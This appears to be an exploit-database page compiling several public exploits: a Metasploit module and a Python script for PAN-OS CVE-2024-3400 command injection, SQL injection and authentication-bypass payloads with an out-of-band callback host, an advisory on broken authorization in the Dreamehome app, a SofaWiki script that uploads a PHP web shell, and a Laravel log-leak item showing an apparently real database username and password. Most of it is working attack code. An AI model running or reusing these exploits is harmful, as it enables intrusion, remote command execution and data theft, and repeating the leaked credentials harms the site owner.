(res_check_not_created.code != 404)<br /> return CheckCode::Safe('Arbitrary file write did not succeed')<br /> end<br /><br /> CheckCode::Vulnerable("Arbitrary file write succeeded: /var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name} NOTE: This file will not be deleted")<br /> end<br /><br /> def touch_file(file)<br /> # Exploit primitive similar to `touch`, creating an empty file owned by root in the specified location<br /> fail_with(Failure::BadConfig, 'Semicolon cannot be present in file name, due to the cookie injection context') if file.include? ';'<br /><br /> send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'headers' => {<br /> 'Cookie' => "SESSID=./../../../..#{file}"<br /> }<br /> )<br /> end<br /><br /> def exploit<br /> # Encode the shell command payload as base64, then embed it in the appropriate exploitation context<br /> # Since payloads cannot contain spaces, ${IFS} is used as a separator<br /> cmd = "echo${IFS}-n${IFS}#{Rex::Text.encode_base64(payload.encoded)}|base64${IFS}-d|bash${IFS}-"<br /><br /> # Create maliciously named files in both telemetry directories that might be used by affected versions<br /> # Both files are necessary, since it seems that some PAN-OS versions only execute payloads in 'hour' and others use 'minute'.<br /> # It's possible that the payload will execute twice, but we've only observed one location working during testing<br /> files = [<br /> "/opt/panlogs/tmp/device_telemetry/hour/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`",<br /> "/opt/panlogs/tmp/device_telemetry/minute/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`"<br /> ]<br /><br /> files.each do |file_path|<br /> vprint_status("Creating file at #{file_path}")<br /> touch_file(file_path)<br /><br /> # Must register for clean up here instead of within touch_file, since touch_file is used in the check<br /> register_file_for_cleanup(file_path)<br /> end<br /><br /> print_status('Depending on the PAN-OS version, it may take the telemetry service up to one hour to execute the payload')<br /> print_status('Though exploitation of the arbitrary file creation vulnerability succeeded, command injection will fail if the default telemetry service has been disabled')<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation<br /># Date: 21 Apr 2024<br /># Exploit Author: Kr0ff<br /># Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400<br /># Software Link: -<br /># Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 <br /># PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1<br /># PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1<br /># Tested on: Debian<br /># CVE : CVE-2024-3400<br /><br />#!/usr/bin/env python3<br /><br />import sys<br /><br />try:<br /> import argparse<br /> import requests<br />except ImportError:<br /> print("Missing dependencies, either requests or argparse not installed")<br /> sys.exit(2)<br /><br /># https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis <br /># https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/<br /><br />def check_vuln(target: str, file: str) -> bool:<br /> ret = False<br /> <br /> uri = "/ssl-vpn/hipreport.esp"<br /> <br /> s = requests.Session()<br /> r = ""<br /> <br /> headers = {<br /> "User-Agent" : \<br /> "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0<br /> "Content-Type": "application/x-www-form-urlencoded",<br /> "Cookie": \<br /> f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"<br /> } <br /> <br /> headers_noCookie = {<br /> "User-Agent" : \<br /> "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0<br /> }<br /> <br /> if not "http://" or not "https://" in target:<br /> target = "http://" + target <br /> try:<br /> r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )<br /> except requests.exceptions.Timeout or requests.ConnectionError as e:<br /> print(f"Request timed out for \"HTTP\" !{e}")<br /><br /> print("Trying with \"HTTPS\"...")<br /><br /> target = "https://" + target<br /> try:<br /> r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )<br /> except requests.exceptions.Timeout or requests.ConnectionError as e:<br /> print(f"Request timed out for \"HTTPS\"")<br /> sys.exit(1)<br /> else:<br /> r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )<br /><br /> if r.status_code == 200:<br /> r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )<br /> if r.status_code == 403:<br /> print("Target vulnerable to CVE-2024-3400")<br /> ret = True<br /> else:<br /> return ret<br /><br /> return ret<br /> <br /> <br /><br />def cmdexec(target: str, callback_url: str, payload: str) -> bool:<br /> ret = False<br /> p = ""<br /><br /> if " " in payload:<br /> p = payload.replace(" ", "${IFS)")<br /><br /> uri = "/ssl-vpn/hipreport.esp"<br /><br /> headers = {<br /> "User-Agent" : \<br /> "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0<br /> "Content-Type": "application/x-www-form-urlencoded",<br /> "Cookie": \<br /> f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"<br /><br /> } <br /><br /> s = requests.Session()<br /> r = ""<br /> <br /> if not "http://" or not "https://" in target:<br /> target = "http://" + target <br /> try:<br /> r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )<br /> except requests.exceptions.Timeout or requests.ConnectionError as e:<br /> print(f"Request timed out for \"HTTP\" !{e}")<br /><br /> print("Trying with \"HTTPS\"...")<br /><br /> target = "https://" + target<br /> try:<br /> r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )<br /> except requests.exceptions.Timeout or requests.ConnectionError as e:<br /> print(f"Request timed out for \"HTTPS\"")<br /> sys.exit(1)<br /> else:<br /> r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )<br /><br /> if not "Success" in r.text:<br /> return ret<br /><br /> else:<br /> ret = True<br /><br /> return ret<br /><br />#Initilize parser for arguments<br />def argparser(selection=None):<br /> parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )<br /> <br /> subparser = parser.add_subparsers( help="Available modules", dest="module")<br /> <br /> exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")<br /> exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )<br /> exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )<br /> exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )<br /> #---------------------------------------<br /> check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )<br /> check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )<br /> check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )<br /><br /> args = parser.parse_args(selection)<br /> args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])<br /> <br /> if args.module == "exploit": <br /> cmdexec(args.target, args.callbackurl, args.payload)<br /><br /> if args.module == "check":<br /> check_vuln(args.target, args.filename)<br /><br />if __name__ == "__main__":<br /> argparser()<br /> print("Finished !")<br /><br /></code></pre>
<pre><code>## Titles: LRMS-PHP-by-oretnom23-v1.0 hat-trick<br />1. Multiple-SQLi<br />2. File Upload<br />3. SQLi Bypass Authentication:<br />## Latest update from the vendor: 5 hours 32 minutes ago<br />## Author: nu11secur1ty<br />## Date: 04/17/2024<br />## Vendor: https://github.com/oretnom23<br />## Software: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection,<br />https://portswigger.net/web-security/file-upload,<br />https://portswigger.net/web-security/authentication<br /><br />## Description:<br />SQLi: The id parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\od5r0eqq0cjgsi6rj3zmuytae1ku8kwbzzqmha6.stupid.com\\fsb'))+'<br />was submitted in the id parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed.The attacker can get all information from the system by<br />using this vulnerability!<br />STATUS: HIGH- Vulnerability<br /><br />---------------------------------------------------------------------------------------------------------------------------------------<br />FU:<br />Using this vulnerability, the attacker can upload any PHP file on the server.<br />The parameter id="cimg" is not sanitizing securely.<br />STATUS: CRITICAL- Vulnerability<br /><br />---------------------------------------------------------------------------------------------------------------------------------------<br />SQLi-Bypass-Authentication:<br />The attacker can bypass the admin login form and login to the system<br />by using this vulnerability.<br />The parameter username is not sanitized securely.<br />STATUS: CRITICAL- Vulnerability<br /><br />[+]Exploits:<br />- SQLi Multiple:<br />```mysql<br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: page=view_room&id=c81e728d9d4c2f636f067f89cc14862c'+(select<br />load_file('\\\\od5r0eqq0cjgsi6rj3zmuytae1ku8kwbzzqmha6.oastify.com\\fsb'))+''<br />OR NOT 5694=5694 AND 'FJxl'='FJxl<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: page=view_room&id=c81e728d9d4c2f636f067f89cc14862c'+(select<br />load_file('\\\\od5r0eqq0cjgsi6rj3zmuytae1ku8kwbzzqmha6.oastify.com\\fsb'))+''<br />OR (SELECT 7377 FROM(SELECT COUNT(*),CONCAT(0x7178787a71,(SELECT<br />(ELT(7377=7377,1))),0x7176787171,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'GMnz'='GMnz<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=view_room&id=c81e728d9d4c2f636f067f89cc14862c'+(select<br />load_file('\\\\od5r0eqq0cjgsi6rj3zmuytae1ku8kwbzzqmha6.oastify.com\\fsb'))+''<br />AND (SELECT 4559 FROM (SELECT(SLEEP(7)))zROX) AND 'HxzI'='HxzI<br />---<br />```<br /><br />- FU:<br />```<br /><?php<br /> phpinfo();<br />?><br />```<br /><br />- SQLi - Bypass-Authentication:<br />```<br />username: nu11secur1ty' or 1=1#<br />password: blank<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/%20hat-trick/LRMS-PHP-by-oretnom23-v1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/04/lrms-php-by-oretnom23-v10-hat-trick.html)<br /><br />## Time spent:<br />01:35:00<br /><br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240418-0 ><br />=======================================================================<br /> title: Broken authorization<br /> product: Dreamehome app<br /> vulnerable version: <=2.1.5 (iOS)<br /> fixed version: none, see solution<br /> CVE number: -<br /> impact: medium<br /> homepage: https://www.dreametech.com<br /> found: 2024-01-17<br /> by: Alissa Kim (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"We've emerged as one of the leading brands in smart home cleaning with<br />our 4 major product lines: robotic vacuums and mops, cordless stick vacuums,<br />wet and dry vacuums, and high-speed hair dryers. Each product is meticulously<br />designed to redefine convenience in household innovation and improve our<br />users' homes."<br /><br />Source: https://www.dreametech.com/pages/about-us<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor was unresponsive/uncooperative during multiple months of trying to<br />establish a security contact and to send them our findings. There is no patch/<br />solution available. Try to contact your local support team and request a patch<br />for this issue. Stay up-to-date with firmware and app installations and be vigilant.<br /><br />SEC Consult highly recommends to perform a thorough security review of the product<br />conducted by security professionals to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Broken authorization<br />An owner of the robot vacuum cleaner device can share it with other users via the<br />app. The privileges of the shared users are very limited. It is not possible to<br />interact with photos and videos from within the mobile application, but it was<br />identified that it is possible to delete and list all images/videos of the main<br />account and even download the encrypted images/videos by sending the requests<br />with the JWT of the shared user. The encryption was not reverse-engineered but<br />it could potentially be possible for unauthorized users to gain access to sensitive<br />imaging data.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Broken authorization<br />To exploit the vulnerability it is sufficient to follow these steps:<br />1. Connect a robot vacuum cleaner to the Dreamehome app (in our case the device<br /> "Dreame L10S ultra" was used).<br />2. Take a photo and video with the Dreamehome app using the connected device.<br />3. Share the robot vacuum cleaner with another user.<br />4. The "shared user" can list the photos using the following curl command:<br /> (It is necessary to set the "did" of the device)<br /><br />[ POC removed]<br /><br />5. The "shared user" can list the videos using the following curl command:<br /><br />[POC removed]<br /><br />6. The response with the list of photos/videos contains an "id" parameter. Knowing<br />this "id" parameter, a shared user can delete the photos/videos using the value<br />of "id" in the "ossIds" parameter using the following command:<br /><br />[POC removed]<br /><br />7. Furthermore, the responses with the list of photos/videos contains a "filepath"<br />parameter with the URL to the encrypted photo/video. Any user even without a valid JWT<br />token can download the encrypted photo/video using this URL. The encryption was not<br />reverse-engineered but it could potentially be possible for unauthorized users to gain<br />access to sensitive imaging data.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions have been tested which were the latest version available<br />at the time of the test:<br />* Dreamehome app 2.1.0 (tested with Dreame L10S ultra device)<br />* Dreamehome app 2.1.5 was tested later on 2024-04-12 and found to be vulnerable<br /> as well.<br /><br />It is assumed, that other platforms (Google Android) are affected as well.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-01-24: Contacting vendor through support.us@dreame.tech; aftersales@dreame.tech<br />2024-02-05: Contacting vendor through support.us@dreame.tech; aftersales@dreame.tech<br />2024-02-06: Answer from vendor ticket system (#82462919) to contact marketing@dreame.tech<br />2024-02-06: Contacting vendor through marketing@dreame.tech, no response.<br />2024-02-12: Contacting vendor through marketing@dreame.tech, no response.<br />2024-03-04: Contacting vendor through marketing@dreame.tech, no response.<br />2024-04-11: Sending final email to support.us@dreame.tech; aftersales@dreame.tech<br /> and marketing@dreame.tech. Requesting security contact again. As they<br /> are unresponsive, setting release date to 18th April.<br />2024-04-11: Same ticket auto-response (#82521551) as from 2024-02-06:<br /> "Thank you for your great support and interest in our products!<br /> This is Dreame aftersales team; we are glad to be at your service.<br /> For your request, please kindly contact our marketing department<br /> (Email: marketing@dreame.tech) for direct assistance.<br /><br /> Feel free to contact us with product related issues or concerns you<br /> may have."<br />2024-04-11: Sending them once again that marketing does not respond (and should not<br /> be responsible for security) and that we proceed to release the advisory<br /> on 2024-04-18.<br />2024-04-12: Vendor: "Thank you for reaching Dreame. We're sorry for the inconvenience.<br /> According to our service policy, we have no access to confirm any<br /> application for cooperation. We have already contacted our sales<br /> team and IT support to further check your information. They will<br /> reply to you if they decide to proceed cooperation with you.<br /> Your kind understanding and patience are greatly appreciated."<br />2024-04-18: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor was unresponsive/uncooperative during multiple months of trying to<br />establish a security contact and to send them our findings. There is no patch/<br />solution available. Try to contact your local support team and request a patch<br />for this issue. Stay up-to-date with firmware and app installations and be vigilant.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Alissa Kim / @2024<br /><br /></code></pre>
<pre><code># Exploit Title: SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated)<br /># Discovered by: Ahmet Ümit BAYRAM<br /># Discovered Date: 18.04.2024<br /># Vendor Homepage: https://www.sofawiki.com<br /># Software Link: https://www.sofawiki.com/site/files/snapshot.zip<br /># Tested Version: v3.9.2 (latest)<br /># Tested on: MacOS<br /><br /><br />import requests<br />import random<br />import sys<br />import time<br /><br />def main():<br />if len(sys.argv) < 4:<br />print("Usage: python exploit.py <base_url> <username> <password>")<br />sys.exit(1)<br /><br />base_url, username, password = sys.argv[1:4]<br /><br /><br />filename = f"{random.randint(10000, 99999)}.phtml"<br /><br /><br />session = requests.Session()<br /><br /><br />login_url = f"{base_url}/index.php"<br />login_data = {<br />"submitlogin": "Login",<br />"username": username,<br />"pass": password,<br />"name": "SofaWiki",<br />"action": "login"<br />}<br />print("Exploiting...")<br />time.sleep(1)<br />response = session.post(login_url, data=login_data)<br />if "Logout" not in response.text:<br />print("Login failed:", response.text)<br />sys.exit()<br /><br />print("Login Successful")<br />time.sleep(1)<br />php_shell_code = """<br /><html><br /><body><br /><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><br /><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><br /><input type="SUBMIT" value="Execute"><br /></form><br /><pre><br /><?php<br />if(isset($_GET['cmd']))<br />{<br />system($_GET['cmd']);<br />}<br />?><br /></pre><br /></body><br /></html><br />"""<br /><br />print("Shell uploading...")<br />time.sleep(1)<br />upload_url = f"{base_url}/index.php"<br />files = {<br />"uploadedfile": (filename, php_shell_code, "text/php"),<br />"action": (None, "uploadfile"),<br />"MAX_FILE_SIZE": (None, "8000000"),<br />"filename": (None, filename),<br />"content": (None, "content")<br />}<br />response = session.post(upload_url, files=files)<br />if response.status_code == 200:<br />print(f"Your shell is ready: {base_url}/site/files/{filename}")<br />else:<br />print("Upload failed:", response.text)<br /><br />if __name__ == "__main__":<br />main()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Laravel Framework 11 - Credential Leakage<br /># Google Dork: N/A<br /># Date: [2024-04-19]<br /># Exploit Author: Huseein Amer<br /># Vendor Homepage: [https://laravel.com/]<br /># Software Link: N/A<br /># Version: 8.* - 11.* (REQUIRED)<br /># Tested on: [N/A]<br /># CVE : CVE-2024-29291<br /><br />Proof of concept:<br />Go to any Laravel-based website and navigate to storage/logs/laravel.log.<br /><br />Open the file and search for "PDO->__construct('mysql:host=".<br />The result:<br />shell<br />Copy code<br />#0<br />/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70):<br />PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0',<br />Array)<br />#1<br />/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46):<br />Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...',<br />'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)<br />Credentials:<br />Username: u429384055_jscv<br />Password: Jaly$$a0p0p0p0<br />Host: sql1...<br /><br /></code></pre>